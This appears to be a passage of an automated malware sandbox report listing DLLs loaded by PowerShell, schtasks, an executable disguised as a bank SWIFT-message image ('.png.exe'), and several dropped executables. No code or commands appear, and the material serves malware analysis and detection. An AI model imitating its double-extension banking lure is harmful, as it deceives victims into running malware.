Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: cryptbase.dll
